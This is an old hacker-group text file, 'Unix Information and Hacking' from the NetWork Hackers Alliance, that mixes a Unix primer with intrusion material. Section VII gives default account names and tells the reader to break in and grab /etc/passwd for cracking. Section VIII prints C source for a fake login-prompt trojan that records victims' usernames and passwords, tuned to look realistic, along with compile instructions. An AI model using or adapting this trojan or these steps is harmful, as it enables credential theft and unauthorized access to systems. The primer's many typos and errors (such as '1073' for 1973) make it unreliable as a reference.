___ ___ ___ ___ ___________ | \ | |\ | |\ | |\ | |\ | \ | | | | | | | | | | ___ | | | \ | | | | |_|_| | | | |\ _| | | | \| | | | | | | |_|_| | | | |\ | | | ___ | | | ___ | | | | \ | | | |\ _| | | | |\ _| | | | | |\ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |___| | |___| | |___| | |___| | |___| | |___| | \___\| \___\| \___\| \___\| \___\| \___\| - A Production of the NetWork Hacker Alliance INC - PreZidents:Inphiniti & Code of Honor & Cobra NHA Member Boards Listing +=+=+=+=+=+=+=+=+=+=+=+=+ +---------------------+---------------+-------------+---------+ | Inphiniti's Edge | 216-662-5115 | NHA *WHQ* | NoT | | Project Phusion | 301-365-9249 | NHA Node 1 | NoT | | Realm of Chaos | 516-466-8259 | NHA Node 2 | Ex-NASTY| +---------------------+---------------+-------------+---------+ NHA is now accepting applications.. If you are intrested and knowledgable in the Hacking of Networks and Phreaking etc, please call your fine H/p bbs system and download 'NHA-APP.TXT' and upload it to Inphiniti's Edge. +--------------------------+ | -- NHA -- | | NetWork Hackers Alliance | +--------------------------+ Presents Issue 2 : "Unix Information and Hacking" Compiled by Inphiniti & Cobra Edited by Inphiniti & Cobra --- AXiS & NHA have merged as of 06/30/91 for the better of H/P in America. --- --- Index I. Introduction II. History of UNIX III. Unix Portability (other names for Unix) IV. Frequently Used Commands (explained in detail) V. Unix Editors (explained in detial) VI Standard Unix Utilities VII. UNIX Default Accounts VIII. UNIX Password Attacker IX. Closing Remarks --- +-----------------+ | I. Introduction | +-----------------+ What is an Operating System? UNIX is a modern day operating system. But, what is an operating system? One definition of an operating system is: "the programs of a digital computer system which, together with the characteristics of the computer system, form the basis of the various operational modes of the digital computer system and especially those which control and supervise the processing of programs." This compact and comprehensive description assumes the understanding of some concepts. The "digital computer system" is the hardware. These are the physical components of the computer which can be touched. Thirty years ago this description would have been sufficient. Today addicitonal concepts are required. Besides the "body", a computer system must have a "soul". Since a "soul" must be immaterial, it can only consist of software in a computer. This software is the operating system. Therefore, the characteristics, better yet the hardware characteristics of the computer system, together with the operating system form the basis of the processing capabilities. The operating system does not include all the software in a computer. This is the software which permites the user of the system to execute the applications software specifically written to be used with that operating system. The user of a modern computer system is no longer confronted by the hardware, but with the operating system such as UNIX. From this viewpoint of the user, there are three basic operating modes o Batch Processing o Conversational (or interactive) mode o Real-time processing Batch processing originated during the time when executable programs were read on a card reader in the form of a punched card dec, consisting of control statements and the actual program.. The punched cards have now disappeared - at best they can still be found as scraps for notes - but the concept and the operating mode remains. Batch jobs A barch job must be defined completely and in the proper sequence. The ] control statements are usually stored in a file. One of these statements calls the program to be executed Several programs can be initiiated within a batch job. However, all required operating devices such as disck storage, magnetic tape storage, printer, plotter, etc. must be requested from inside the job. No calls to the operating system are permitted since they are not answered. Unix and MS-DOS,CP/M or OS/2 UNIX is the oldest of the three systems, even though it has been discussed only in the last few yeards. CP/M and MS-DOS are oriented strongly toweds the main features if UNIX. The newer versions of MS-DOS resemble UNIX very much. Even the command syntax is very similar The largest step in the direction of UNIX came with DOS Version 2.0. Viewed from the users perspectivem the file systems of UNIX and DOS resemble earch other alot. Both orginate in a root are structured hierarchically (like a tree). Directories permit the user to retain an overview. Besides the common files and directories, UNIX also knows an additional type, the device file. Devide files provide an interface to the physical devices which are addressed just like an ordinart file. Special systems call for control of the peripherals and are therefore not required. Internally a UNIX file differs from a CO/M or DOS file. The orientation towards the record oand bloack structure of a disk has been dropped. UNIX recoqnizes only blocks which contain byte chains. The type of file does not make any difference to UNIX, since it is only a concern of the application program using the file. +---------------------+ | II. History of Unix | +---------------------+ The history of UNIX begain in 1969 at Bell Labortatories, which is part of AT&T. Kennth Thompson developed an operating system writtern in DEC PDP-7 assembler code for the "Soace Travel" project. He called it UNIX. The names was derived from the preceding operating system Multics which was less conservative in the use of scare computer resources. UNIX was at first a single user variant of Multics. In 1971 UNIS was implemented again in assembler code on ther more powerful computers of the PDP-11 series. To become more independant from another change in hardware, Thompson planned a new implementation in a higher level language. He developed the B language from BCPL in 1970, but this language did not prove powerful enough. After Dennis Ritchie, also a Bell, created the C language, UNIX was rewritten almost completely in this higher level language by 1073. By utilizing the advantages of C, UNIX became capable of handling multiusers and multi-tasking. UNIX was then machine independent and the start signal for its rapid distribution was given. At that time, Version 5 was still being distributed to American universites free of chare for use in research and education. Berkeley University in particular developed UNIX further. The real triumph begain in 1975 with Version 6. AT&T granted source licenses to intrested companies, but without support. From this release, derivatives of UNIX were created with spilt away from the main development. Version 7 of UNIX appeard about the same time as the first 16-bit microprocessors. This is the version onwhich most of todays Unix derivatives are based. A third branch also developed, which is characterizedmost by the Microsoft product XENIX. Since 1983 AT&T has tried to bring the various development streams together again. Training, documentation and other support is being offered. The external sign is a new number series know as System V. +------------------------+ | III. Unix Portability | +------------------------+ System Name Manufacturer ----------- ------------ Aix IBM bsd University of California at Berkeley Coherent Mark Williams Co. Cromix Cromemco Edition VII Perkin-Elmer EUNIX Electronic Info Systems, INC IDRIS Whitesmith Ltd. IS/1 Interactive Systems, INC IS/5 Interactive Systems, INC JOS CRDS MUNIX PCS OS-1 Software Labs SINIX Siemens Unica Knowlogy UTS Amdahl UNIX Nixdorf UX Hwelett Packard VENIX Ventur Com Ulnc. XENIX Microsoft Co. ZEUS Zilog +-------------------------------+ | IV. Frequently Used Commands | +-------------------------------+ Name: CAL Syntax: cal [MM] yyyy Function: Creates calendar excerpts. Options: None Name: CANCEL Syntax: cancel [reqiest-id ...] [printer ...] Function: Print reuest made with ld or 1pr are canceled Options: None Name: CAT Syntax: cat [filename] Function: Writes the files indicated screen Options: none Name: CLEAR Syntax: clear Function: Clears the display screen. Options: none Name: COMM Syntax: comm [optoms] dat1 dat2 Function: Displays the lines common to files dat1 and dat2 Options: -1 \ -2 > Suppress output of the corresponding columns/lines -3 / Name: CRYPT Syntax: crypt [key] Functions: Encodes and decodes text. Options: None Name: DATE Systax: date [date, time] Functions: Outputs date and time Options: None Name: DU Syntax: du [option] [dat1] ... Functions: Returns the disk usage or block assignment o the files. Options: -a Block number for eache file (defult) -s Only the total number of blocks is indicated Name: ECHO Syntax: echo [arguments] [\character] Function: Output of commentary in shell procedures. Options: System dependant. Name: FILE Syntax: file [options] file1 ... Function: Attempts to determine the specified files class. Options: Machine dependant. Name: GREP Syntax: grep [options] expressions [file1] ... Function: Searched the specified files for text patterns which where indicated. Options: -b Include Bloack numbers -c Count number of matching lines -f file Searches ex[ression is in the indicated file and not in the arguement. -h No filename in the output line -n Output line number in every hit line -s No output, only status for procedures 0 = hit 1 = not hit 2 = syntax error -v Inversion of the command -y No distinction made between upper and lower case letters Name: HEAD Syntax: head [option] [file1] ... Function: The first N lines of stdin, or the files indicated Options: -n Indicates the numbner of lines from the beginning of the file. Name: LOGIN Syntax: login NAME Function: Logs new users on the system and removes old users. Options: None Name: LP Syntax: lp [options] [file1] ... Function: Insterts a print request ino the wait quee of the spool system. Options: -c Creates a temporary Copy file -m After print output, a message is sent by mail to the orginator -r remove file after insertion of a temporary copy into waiting queue Name: LPSTAT Syntax: lpstat [options] [request...] Function: Provides information for the spool system, including the current status of th print queue Options: -u [list] oputputs the status of all print requests for users in the list specified, each sperarated by a comma. Name: MORE & PG Syntax: more [options] [file1] ... pg [options] [file1] ... Function: Display ready preparation of output with user controls for ease of viewing. Options: -l returs a disply ready list Name: PASSWD Syntax: passwd [user-name] Function: Change or define a new password Options: None Name: PR Syntax: pr [options] [file1] ... Function: Prepates files for printing. Options: -h following textis output as header. -l[n] Lines per page -n n column output -n[nz] Line numbering n = Number Size z Dividing charaters between line numbers and content -o[n] n charaters spaces at the left border -p[n] After n pages, wait so that baper can be changed -t Suppresses title, line numbers and date. -w[n] Page width in charaters. Name: PS Syntax: ps [options] [process1 ...] [user1 ...] Function: Gives status information about active processes. Options: -a All interactive processes. -e All process for all users. -f Complete information list -l long form of the information list. -u user all process for the indicated users. Name: SORT syntax: sort [options] [+pos1] [-pos2] [file1] ... Function. Sorts the lines of all files indicated according to the ascii character set. Options: -b Ignore blanks and tab characters at the begining of the file. -d Consider only alphanumeric characters and blanks. -f Treat uppercase letters as lowercase -r Sort in revers order. -t [c] Dividing character c, may not be a space Name: SPLIT Syntax: split [-n] [file [name]] Function: Splits the indicated file into parts of n lines each. Option: -n Number of lines for each partial file. Name: TAIL Syntax: tail [n [units]] [file1 ...] Functions: Copies the named file to stdout, beginning at the designated postion within the file. Options: None Name: TIME Syntax: time [command] Function: Returns the execution time of a command or program with actual delays in seconds. Options: None Name: WC Syntax: wc [options] [file1] ... Function: Counts lines, words and/or charaters in the indicated file Options: -l counts only lines -w counts only words -c counts only characters Name: WHO syntax: who Function: Returns information about current users, user ids, terminals and start of session. Options: None +-----------------+ | V. Unix Editors | +-----------------+ There are three basic editors in the unix environment. Some systems have other non-portable editors but there are three basic ones. ed: - line oriented - interactive sed: - line oriented - not interactive - for batch processing vi: - most powerful UNIX editor - interactive - full screen capability -- ED Editor Command Summary -- syntax: ed [-] [-x] [file] Commands -------- a append i insert c change w [file] write to [file] . current line $ last line n Specifir line number n +n Go ahead N lines -n Go back N lines d delete e file Reads file into current file f outputs name of processed files j join l list p print r file read and insserrs specified file behind the indicated buffer m [line] move to line # t [line] transfer to line # u undo q quit ! executes the shell command -- SED Editor Command Summary -- Syntax: sed [-n] [-e script] [-f cmd_file] [input_file ...] Options: -e sed command can be indicated directly -f sed command are read from specifierd command file -n suppresses the standard output -- VI Editor Command Summary -- a append i insert o open esc to exit insert mode w write file q to quit j move down one line k move up one line +-----------------------------+ | VI. Standard Unix Utilities | +-----------------------------+ (Please Note: When entering this commands in UNIX you type in lower case) ACCEPT Permits spooling request for printer ADB Absolute debugger AR Maintains portable archives and libaries AS Assembler AT Executes commands at a later time AWK Pattern scanning and processing language BANNER Makes text banners BASENAME Outputs filename from path name BATCH Executes commands at a later time BC Desktop calculator with programming constuctions BDIFF Compares two large files BFS Big file scanner CAL Outputs a Calander CALENDAR Appointment scheduler CANCEL Cancels previous spool requests CAT COncatenates and prints files CC C Language compiler CD Changed current work directory CHGRP Changes group ownership of file or directory CHMOD Changes file access permission CHOWN Changes file ownership CMP Compares two files COL Filters revers line feeds COMM Selects or rejects lines common to two sorted files CP Copies files COIP Copies files archives in and out CPP C language preprocessor CRYPT Encodes and Decodes text CSPLIT Splits files based on pattern matching CT Spawns a getty process to a remote terminal CTRACE Traces C program execution CU Calls another UNIX system CUT Cuts out selected fields of each line of a file CREF Generates C program cross-reference listing DATE Sets or prints the current date DC Desktop calculator DD Performs file trasnformations DEROFF Removes formatting commands from file DF Displays free space in file system DIFF Compares two files DIFF3 Compares three files DIRCMP Compares directories DIRNAME Outputs the path from a path name DIS Object file disassembler DISABLE Disables spooling on printer DU Summarizes Disk usage ECHO Echoes arguments ED Line-oriented editor EDIT Line-oriented editor ENABLE Enables spooling on a printer ENV Sets environment for command execution EXPR Evaluates arguments as an expression FACTOR Obtains prime factors of a number FGREP Searchs a file for a character string FILE Determines file type FIND Searches for files FSDB Debugs damaged file systems GED Graphical Editor GETOPTS Phrase command line options GLOSSARY Displays definitions of UNIX system terms and symbols GRAPH Draws a graph GRAPHICS Accesses graphical and numerical commands GREEK Selects terminal filter GREP Selects lines of a file based on a pattern matching GUTIL Graphical utilties HELP Provides on-line help on UNIX commands HELPADM Makes changes to the Help Facility Database ID Outputs user and group ID's and names IPCS Reports interprocess communication ffacilities status JOIN Joins two tabular data files KILL Terminates or signals a process LINE Copies a line from standard input to output LN Links file names LOGIN Admits autorized users to system LOGNAME Outputs the user's login name LP Line printer spooler LPR Line printer spooler LPADMIN Configes the 1p spooling system LPSTAT Printer spooling status information LS Lists contents of directories M4 Macro processor MAIL Sends and recieves UNIX mail MAILX Extended Mail Facility MAKE Regenerates groups of programs MAKEKEY Regenerates encryption key MAN Prints on-line manual entries MESG Permits or denies messages MKDIR Makes a Directory MKFS Creates a file system on disk MKNOD Creates a directory entry for a special file MOUNT Mounts a file system MV Moves files MVDIR Moves a directory NEWFORM Reformats lines of a text file NEWGRP Changes active group membership NEWS Prints News commands NICE Runs a program at reduced priority NL Line numbering filter NOHUP Runs a command immune from hang-ups and quits NROFF Text formatter OD Outputs an octal dump of a file PACK Packs files PASSWD Changes online users password PASTE Merge lines of files PCAT Concatenates packed files PG Browse file contents on terminal screen PR Print files PS Outputs process status PWD Prints the name of the current working directory RM Removes files RMDIR Removes directories RSH Restricted UNIX system shell SAG Outputs system activity graph SAR Outputs system activity report SCAT Concatenates and prints files SDB Symbolic debugger SDIFF Compares two files SED Stream Editor SH The Unix system shell SHL Shell layer manager SHUTDOWN Shuts down the system SLEEP Suppends execution for a time interval SORT Sorts and merges files SPLIT Splits a file STARTER Displays UNIX information for new users STRIP Removres symbol table information from object file STTY Sets ternubak characterustics SU Tempararily changes the user-ID SUM Outputs checksum and block count for file SYNC Writes disk buffers to disk SYSADM Menu Driven system administration utility TABS Srets tabs on a terminal TAIL Outputs the last oart of a file TAR Tape file archiver TEE Pipe fitter TEST Evaluates conditions TIME Times command execution TOUCH Updates access and modifications times of a file TR Character translation fiflter TROFF Phototypesetter text formatter TRUE Returns true value TTY Outputs name of a terminal UNMASK Setsr file creation mode mask UMOUNT Dismounts a file system UNAME Outputs the name of the current UNIX system UNIQ Outputs a file with unique lines UNITS Performs units conversions UNPACK Unpacks packed files USAGE Displays information about command usage UUCP Copies files between UNIX systems UULOG Outputs UUCP log information UUNAME Outputs UUCP names of known systems UUSTAT Outputs UUCP status information UUX Executes a command on a remote UNIX system VI Full screen editor WAIT Waites for completeion of background processing WALL Sends a message to all users WC Outputs line, word and character counts for files WHO Outpurts information on current users WRITE Sends messages to another user XARGS Constructs an argument list and executes a command YACC Compiler-generating tool +----------------------------+ | VII. Unix Defualt Accounts | +----------------------------+ Super User Default Accounts ROOT MAKESYST MOUNTSYS UMUNTFSYS CHECKSYS FSYS Regular User Defaults DAEMON DAEMONx (x value is 1 thru 9) LP Unix Systems that have already been hacked try.. ROCUSER IEx (x value is 1 thru 4) ANONYMOUS GUEST If it askes for a password I doubt you will get in but always try the account name. Once in type this (at the waiting prompt usually a # or $) cd /ETC (UNIX root directory) cat PASSWD (UNIX password file) <--- Capture this if you can get it then find a UNIX hacker on your local H/P board and let it run! +------------------------------+ | VIII. Unix Password Attacker | +------------------------------+ /* this is what a 'C' comment looks like. You can leave them out. */ /* #define's are like macros you can use for configuration. */ #define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n" /* The above string should be made to look like the message that your * system prints when ready. Each \n represents a carriage return. */ #define LOGIN "login: " /* The above is the login prompt. You shouldn't have to change it * unless you're running some strange version of UNIX. */ #define PASSWORD "password:" /* The above is the password prompt. You shouldn't have to change * it, either. */ #define WAIT 2 /* The numerical value assigned to WAIT is the delay you get after * "password:" and before "login incorrect." Change it (0 = almost * no delay, 5 = LONG delay) so it looks like your system's delay. * realism is the key here - we don't want our target to become * suspicious. */ #define INCORRECT "Login incorrect.\n" /* Change the above so it is what your system says when an incorrect * login is given. You shouldn't have to change it. */ #define FILENAME "stuff" /* FILENAME is the name of the file that the hacked passwords will * be put into automatically. 'stuff' is a perfectly good name. */ /* Don't change the rest of the program unless there is a need to * and you know 'C'. */ #include #include int stop(); main() { char name[10], password[10]; int i; FILE *fp, *fopen(); signal(SIGINT,stop); initscr(); printf(SYSTEM); printf(LOGIN); scanf("%[^\n]",name); getchar(); noecho(); printf(PASSWORD); scanf("%[^\n]",password); printf("\n"); getchar(); echo(); sleep(WAIT); if ( ( fp = fopen(FILENAME,"a") ) != NULL ) { #fprintf(fp,"login %s has password %s\n",name,password); #fclose(fp); #} printf(INCORRECT); endwin(); } stop() { endwin(); exit(0); } -- END -- ** this is how you compile it cc horse.c -lcurses -ltermcap mv a.out horse source trap (again, don't type the %) +---------------------+ | IX. Closing Remarks | +---------------------+ Well this is the end of Unix Hacking Volume I. You should have a firm awareness with UNIX now and I hope you continue to grow and wait for our UNIX Hacking Voulume II which will contains holes into the unix system.. NHA nor the Author(s) of this file are responisble for any use that may come into play by the reader. This is meant for education purposes only not for any illegal activities. ___ ___ ___ ___ ___________ | \ | |\ | |\ | |\ | |\ | \ | | | | | | | | | | ___ | | | \ | | | | |_|_| | | | |\ _| | | | \| | | | | | | |_|_| | | | |\ | | | ___ | | | ___ | | | | \ | | | |\ _| | | | |\ _| | | | | |\ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |___| | |___| | |___| | |___| | |___| | |___| | \___\| \___\| \___\| \___\| \___\| \___\| - A Production of the NetWork Hacker Alliance INC - PreZidents:Inphiniti & Code of Honor & Cobra NHA Member Boards Listing +=+=+=+=+=+=+=+=+=+=+=+=+ +---------------------+---------------+-------------+---------+ | Inphiniti's Edge | 216-662-5115 | NHA *WHQ* | NoT | | Project Phusion | 301-365-9249 | NHA Node 1 | NoT | | Realm of Chaos | 516-466-8259 | NHA Node 2 | Ex-NASTY| +---------------------+---------------+-------------+---------+ NHA is now accepting applications.. If you are intrested and knowledgable in the Hacking of Networks and Phreaking etc, please call your fine H/p bbs system and download 'NHA-APP.TXT' and upload it to Inphiniti's Edge. With this file we welcome Keener into NHA. N.H.A. The Future of Hacking and Phreaking In the works.... CBI Advanced Usage TRW Advanced Usage Milton.Edu Advanced Usage more to come from N.H.A.